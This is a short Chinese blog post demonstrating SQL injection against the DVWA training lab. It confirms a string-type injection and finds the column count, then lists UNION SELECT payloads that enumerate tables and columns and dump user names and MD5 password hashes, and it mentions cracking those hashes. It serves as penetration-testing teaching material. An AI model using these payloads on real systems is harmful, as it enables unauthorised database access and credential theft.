渗透测试---SQL注入~dvwa SQLi演示

在dvwaSQL注入模块中

判断出为字符型注入。

id=1' and 1=1 -- 执行成功

id=1' and 1=2 -- 执行失败

使用order by判断列数为2。

id=1' order by 2 -- 执行成功

id=1' order by 3 -- 执行失败

使用union select联合查询

查表:

id=1' and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=database() -- 

id=1' and 1=2 union select (select group_concat(table_name)from information_schema.tables where table_schema=database()),2 -- 

查字段:

id=1' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema='dvwa' and table_name='users' -- 

id=1' and 1=2 union select (select group_concat(column_name)from information_schema.columns where table_schema='dvwa' and table_name='users'),2 -- 

查内容:

id=1' and 1=2 union select group_concat(user,password),2 from dvwa.users -- 

id=1' and 1=2 union select (select group_concat(user,password)from dvwa.users),2 -- 

查询出的密码使用md5进行了加密,可以使用网上的在线解码进行解码操作。

md5加密的密码只能暴力破解。

posted @ 2020-04-27 18:51  强霸卓奇霸  阅读(405)  评论(0)    收藏  举报
https://blog-static.cnblogs.com/files/xiaokang01/js.js 这是添加的文件的链接 color="240,230,140" 粒子的颜色设置 opacity="1" 粒子的透明度 count="75" 粒子的个数